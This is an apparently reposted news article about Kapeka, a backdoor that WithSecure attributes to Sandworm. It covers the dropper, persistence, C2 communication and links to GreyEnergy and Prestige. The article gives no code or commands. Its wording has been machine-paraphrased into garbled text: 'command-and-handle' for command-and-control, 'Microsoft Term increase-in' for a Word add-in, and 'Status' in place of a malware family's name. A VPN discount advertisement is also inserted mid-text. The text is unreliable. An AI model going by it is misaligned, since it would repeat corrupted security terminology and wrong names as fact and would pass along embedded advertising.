A formerly undocumented “flexible” backdoor called Kapeka has been “sporadically” observed in cyber attacks concentrating on Eastern Europe, which include Estonia and Ukraine, because at least mid-2022.
The findings occur from Finnish cybersecurity business WithSecure, which attributed the malware to the Russia-linked advanced persistent danger (APT) group tracked as Sandworm (aka APT44 or Seashell Blizzard). Microsoft is tracking the similar malware underneath the title KnuckleTouch.
“The malware […] is a flexible backdoor with all the vital functionalities to provide as an early-stage toolkit for its operators, and also to present long-time period access to the victim estate,” security researcher Mohammad Kazem Hassan Nejad stated.
Protect your privacy by Mullvad VPN. Mullvad VPN is one of the famous brands in the security and privacy world. With Mullvad VPN you will not even be asked for your email address. No log policy, no data from you will be saved. Get your license key now from the official distributor of Mullvad with discount: SerialCart® (Limited Offer).
➤ Get Mullvad VPN with 12% Discount
Kapeka comes fitted with a dropper that’s intended to launch and execute a backdoor element on the contaminated host, after which it eliminates alone. The dropper is also responsible for placing up persistence for the backdoor both as a scheduled endeavor or autorun registry, dependent on no matter whether the system has System privileges.
Microsoft, in its very own advisory released in February 2024, explained Kapeka as involved in various strategies distributing ransomware and that it can be applied to carry out a wide variety of capabilities, this kind of as stealing credentials and other knowledge, conducting damaging attacks, and granting risk actors remote obtain to the device.
The backdoor is a Windows DLL prepared in C++ and capabilities an embedded command-and-handle (C2) configuration that is utilized to build make contact with with an actor-managed server and retains data about the frequency at which the server requirements to be polled in buy to retrieve instructions.
Other than masquerading as a Microsoft Term increase-in to make it seem legitimate, the backdoor DLL gathers details about the compromised host and implements multi-threading to fetch incoming recommendations, process them, and exfiltrate the results of the execution to the C2 server.
“The backdoor takes advantage of WinHttp 5.1 COM interface (winhttpcom.dll) to carry out its network conversation ingredient,” Nejad defined. “The backdoor communicates with its C2 to poll for responsibilities and to ship again fingerprinted data and task benefits. The backdoor makes use of JSON to mail and obtain data from its C2.”
The implant is also capable of updating its C2 configuration on-the-fly by acquiring a new version from the C2 server throughout polling. Some of the main characteristics of the backdoor allow it to browse and write information from and to disk, start payloads, execute shell commands, and even improve and uninstall alone.
The exact approach as a result of which the malware is propagated is at present not known. Nonetheless, Microsoft noted that the dropper is retrieved from compromised sites utilizing the certutil utility, underscoring the use of a authentic residing-off-the-land binary (LOLBin) to orchestrate the attack.
Kapeka’s connections to Sandworm appear conceptual and configuration overlaps with formerly disclosed households like GreyEnergy, a very likely successor to the BlackEnergy toolkit, and Status.
“It is most likely that Kapeka was utilised in intrusions that led to the deployment of Prestige ransomware in late 2022,” WithSecure mentioned. “It is possible that Kapeka is a successor to GreyEnergy, which by itself was possible a replacement for BlackEnergy in Sandworm’s arsenal.”
“The backdoor’s victimology, rare sightings, and level of stealth and sophistication reveal APT-degree exercise, very most likely of Russian origin.”
Observed this short article interesting? Abide by us on Twitter and LinkedIn to read more distinctive articles we submit.
Some pieces of this write-up are sourced from:
thehackernews.com